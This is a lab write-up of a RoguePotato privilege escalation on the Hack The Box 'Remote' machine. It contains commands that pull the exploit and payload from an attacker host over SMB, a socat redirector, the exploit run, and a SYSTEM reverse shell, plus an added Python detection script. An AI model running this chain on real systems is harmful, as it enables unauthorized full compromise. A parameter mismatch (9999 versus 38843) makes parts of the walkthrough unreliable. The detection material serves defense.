Rogue Potato
JuicyPotato does not work on anything below Windows 10 1809 and Windows Server 2019. The target system is Windows Server 2019, so I will be using an alternative: RoguePotato.
- Rogue Potato instructs the DCOM server to perform a remote OXID query by specifying a remote IP (the attacker's IP)
- On the remote IP, set up a “socat” listener that redirects the OXID resolution requests to a fake OXID RPC server
- The fake OXID RPC server implements the ResolveOxid2 server procedure, which will point to a controlled named pipe:
ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
- The DCOM server will connect to the RPC server in order to perform the IRemUnknown2 interface call. By connecting to the named pipe, an “Authentication Callback” will be performed and we can impersonate the caller via an RpcImpersonateClient() call.
- Then, a token stealer will:
  - Get the PID of the rpcss service
  - Open the process, list all handles and, for each handle, try to duplicate it and get the handle type
  - If the handle type is “Token” and the token owner is SYSTEM, try to impersonate and launch a process with CreateProcessAsUser() or CreateProcessWithToken()
What do you need to make it work?
- You need a machine under your control where you can perform the redirect, and this machine must be reachable on port 135 by the victim
- Upload both exe files from the PoC. In fact, it is also possible to launch the fake OXID Resolver in standalone mode on a Windows machine under our control when the victim's firewall won't accept incoming connections. More info: https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html
Exploit
Exploit found online from the official GitHub repository
Exploitation
PS C:\tmp> copy \\10.10.14.5\smb\potato\RoguePotato.exe .
PS C:\tmp> copy \\10.10.14.5\smb\potato\pe.exe .
I transferred both the exploit and the payload over SMB.
┌──(kali㉿kali)-[~/…/htb/labs/remote/potato]
└─$ socat tcp-listen:135,reuseaddr,fork tcp:10.10.10.180:38843
Initiating the network redirector locally on Kali. Whatever comes in on port 135 gets forwarded to port 38843 on the target.
PS C:\tmp> .\RoguePotato.exe -r 10.10.14.5 -e "C:\tmp\pe.exe" -l 38843
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 38843 ...
[*] IStoragetrigger written:102 bytes
[*] SecurityCallback RPC call
[*] ServerAlive2 RPC Call
[*] SecurityCallback RPC call
[*] ResolveOxid2 RPC call, this is for us!
[*] ResolveOxid2: returned endpoint binding information = ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
[*] Client connected!
[+] Got SYSTEM Token!!!
[*] Token has SE_ASSIGN_PRIMARY_NAME, using CreateProcessAsUser() for launching: C:\tmp\pe.exe
[+] RoguePotato gave you the SYSTEM powerz :D
Executing RoguePotato with:
- -r set to the remote IP of Kali
- -l set to 9999 to receive the forwarded OXID Resolver request
- -e set to launch the payload (C:\tmp\pe.exe) upon successful exploitation
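As an added defender-side example (not from this write-up or the RoguePotato project), the script below flags the two host artefacts the run above leaves behind: a named pipe that ends in \pipe\epmapper but sits under a parent directory, which a normal host never creates, and the RPCSS service opening TCP/135 to a host that is not a known RPC peer. The Sysmon-style field names, the sample events and the peer allow-list are constructed assumptions.

```python
import re

# Sysmon event ids; the dict field names below are a simplified, assumed shape.
PIPE_CREATED, NETWORK_CONNECT = 17, 3

# Hosts rpcss may legitimately contact on TCP/135 (constructed allow-list; in
# production fill this from your domain controller / RPC server inventory).
KNOWN_RPC_PEERS = {"10.10.10.1"}

# The genuine endpoint mapper pipe is exactly "\epmapper". RoguePotato registers
# "<prefix>\pipe\epmapper": the RPC runtime still treats it as an endpoint-mapper
# binding, but the nesting is the tell.
_NESTED_EPMAPPER = re.compile(r"^\\.+\\pipe\\epmapper$", re.IGNORECASE)


def _normalise_pipe(name):
    """Strip an optional \\\\.\\pipe device prefix so both Sysmon forms compare alike."""
    prefix = "\\\\.\\pipe"
    if name.lower().startswith(prefix.lower()):
        name = name[len(prefix):]
    return name


def is_rogue_epmapper_pipe(name):
    """True when a pipe path ends in \\pipe\\epmapper below some parent directory."""
    return bool(_NESTED_EPMAPPER.match(_normalise_pipe(name.strip())))


def is_rpcss_external_oxid(ev):
    """svchost (rpcss host) connecting to TCP/135 on a host outside the allow-list."""
    return (ev.get("id") == NETWORK_CONNECT
            and ev.get("image", "").lower().endswith("\\svchost.exe")
            and ev.get("dst_port") == 135
            and ev.get("dst_ip") not in KNOWN_RPC_PEERS)


def scan(events):
    """Return one alert string per suspicious event, in input order."""
    alerts = []
    for ev in events:
        if ev.get("id") == PIPE_CREATED and is_rogue_epmapper_pipe(ev.get("pipe", "")):
            alerts.append(f"rogue epmapper pipe {ev['pipe']} created by {ev['image']}")
        elif is_rpcss_external_oxid(ev):
            alerts.append(f"rpcss OXID lookup to {ev['dst_ip']}:135 outside known peers")
    return alerts


SAMPLE_EVENTS = [  # constructed, modelled on the run above
    {"id": 17, "image": r"C:\tmp\RoguePotato.exe", "pipe": r"\\.\pipe\RoguePotato\pipe\epmapper"},
    {"id": 17, "image": r"C:\Windows\System32\svchost.exe", "pipe": r"\epmapper"},
    {"id": 3, "image": r"C:\Windows\System32\svchost.exe", "dst_ip": "10.10.14.5", "dst_port": 135},
    {"id": 3, "image": r"C:\Windows\System32\svchost.exe", "dst_ip": "10.10.10.1", "dst_port": 135},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

On a real host the network check should additionally be scoped to the svchost instance hosting the RpcSs service, since other svchost groups also talk to port 135.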
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.180] 49774
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\tmp> whoami
nt authority\system
PS C:\tmp> hostname
remote
PS C:\tmp> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::ba
   IPv6 Address. . . . . . . . . . . : dead:beef::25dd:3404:8d18:2459
   Link-local IPv6 Address . . . . . : fe80::25dd:3404:8d18:2459%12
   IPv4 Address. . . . . . . . . . . : 10.10.10.180
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%12
                                       10.10.10.2
System Level Compromise